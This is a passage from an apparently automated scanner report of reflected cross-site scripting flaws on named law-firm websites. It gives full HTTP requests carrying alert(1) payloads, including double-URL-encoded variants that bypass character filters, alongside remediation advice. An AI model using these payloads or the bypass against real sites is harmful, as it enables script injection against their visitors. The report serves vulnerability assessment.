<!DOCTYPE html PUB ...[SNIP]... "text/javascript"> extra = "height="+screen.height+",width="+screen.width+",location=no"; function printWindow(){ window.open("http://www.skadden.com/PrintToPDF.cfm?print=1&contentID=42&itemID=1478&90bb3"-alert(1)-"0eb36443031=1","PDF",extra) }
function pdfWindow(url){ window.open(url,"PDF",extra); } </script> ...[SNIP]...
2.48. http://www.weil.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.weil.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef2ab</script><script>alert(1)</script>803ebce93f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?ef2ab</script><script>alert(1)</script>803ebce93f8=1 HTTP/1.1 Host: www.weil.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html> <head> <title id="ctl00_htmlTitle">Weil, Gotshal & Man ...[SNIP]... <!-- window["ctl00_ctl04_cmbSearch"] = new RadComboBox("cmbSearch","ctl00_ctl04_cmbSearch");window["ctl00_ctl04_cmbSearch"].Initialize({"LoadOnDemandUrl":"/sitesearchstream.aspx?ef2ab</script><script>alert(1)</script>803ebce93f8=1&rcbID=ctl00_ctl04_cmbSearch&rcbServerID=cmbSearch","OnClientSelectedIndexChanged":"SelectedIndexChanged","OnClientDropDownOpening":"HandleOpen","OnClientFocus":"GotFocus","OnClientBlur":"GotBlur","O ...[SNIP]...
2.49. http://www.weil.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.weil.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd131'-alert(1)-'83a7499dccf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?cd131'-alert(1)-'83a7499dccf=1 HTTP/1.1 Host: www.weil.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html> <head> <title id="ctl00_htmlTitle">Weil, Gotshal & Man ...[SNIP]... <![CDATA[ var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/'+''+'Home.aspx?cd131'-alert(1)-'83a7499dccf=1';//]]> ...[SNIP]...
2.50. http://www.wileyrein.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.wileyrein.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85981"><script>alert(1)</script>038dfd0999c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?85981"><script>alert(1)</script>038dfd0999c=1 HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:10:49 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=18263798;expires=Fri, 11-Jan-2041 15:10:49 GMT;path=/ Set-Cookie: CFTOKEN=29109429;expires=Fri, 11-Jan-2041 15:10:49 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 490d8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea3a95841ba2 was submitted in the REST URL parameter 1. This input was echoed as 490d8"><script>alert(1)</script>a3a95841ba2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css490d8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea3a95841ba2/_blog.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:21 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c8c9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e84fbe621327 was submitted in the REST URL parameter 2. This input was echoed as 1c8c9"><script>alert(1)</script>84fbe621327 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/_blog.css1c8c9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e84fbe621327 HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:22 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86d6e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea6da1f2345d was submitted in the REST URL parameter 1. This input was echoed as 86d6e"><script>alert(1)</script>a6da1f2345d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css86d6e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea6da1f2345d/_list.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d81ed%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eda2c05f8831 was submitted in the REST URL parameter 2. This input was echoed as d81ed"><script>alert(1)</script>da2c05f8831 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/_list.cssd81ed%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eda2c05f8831 HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdd5f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e672638c3b was submitted in the REST URL parameter 1. This input was echoed as bdd5f"><script>alert(1)</script>672638c3b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /cssbdd5f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e672638c3b/_main.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1b51%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e450c96039aa was submitted in the REST URL parameter 2. This input was echoed as f1b51"><script>alert(1)</script>450c96039aa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/_main.cssf1b51%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e450c96039aa HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:58 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de5e6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e848b9694317 was submitted in the REST URL parameter 1. This input was echoed as de5e6"><script>alert(1)</script>848b9694317 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /cssde5e6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e848b9694317/_navMenu.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95db9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaee734d6695 was submitted in the REST URL parameter 2. This input was echoed as 95db9"><script>alert(1)</script>aee734d6695 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/_navMenu.css95db9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaee734d6695 HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25b68%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec5762ef40df was submitted in the REST URL parameter 1. This input was echoed as 25b68"><script>alert(1)</script>c5762ef40df in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css25b68%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec5762ef40df/_navSearch.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:58 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd77a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0a210746c61 was submitted in the REST URL parameter 2. This input was echoed as fd77a"><script>alert(1)</script>0a210746c61 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/_navSearch.cssfd77a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0a210746c61 HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:59 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17ef6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb4bcf499c51 was submitted in the REST URL parameter 1. This input was echoed as 17ef6"><script>alert(1)</script>b4bcf499c51 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css17ef6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb4bcf499c51/_slide.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfc8a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edf9115355d was submitted in the REST URL parameter 2. This input was echoed as dfc8a"><script>alert(1)</script>df9115355d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/_slide.cssdfc8a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edf9115355d HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51eff%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e085a170e769 was submitted in the REST URL parameter 1. This input was echoed as 51eff"><script>alert(1)</script>085a170e769 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css51eff%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e085a170e769/main.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78b32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb5e2c8ed40b was submitted in the REST URL parameter 2. This input was echoed as 78b32"><script>alert(1)</script>b5e2c8ed40b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/main.css78b32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb5e2c8ed40b HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78055%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea8d52b987de was submitted in the REST URL parameter 1. This input was echoed as 78055"><script>alert(1)</script>a8d52b987de in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css78055%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea8d52b987de/ui/ui.accordion.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 801be%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e35c17289cf6 was submitted in the REST URL parameter 2. This input was echoed as 801be"><script>alert(1)</script>35c17289cf6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
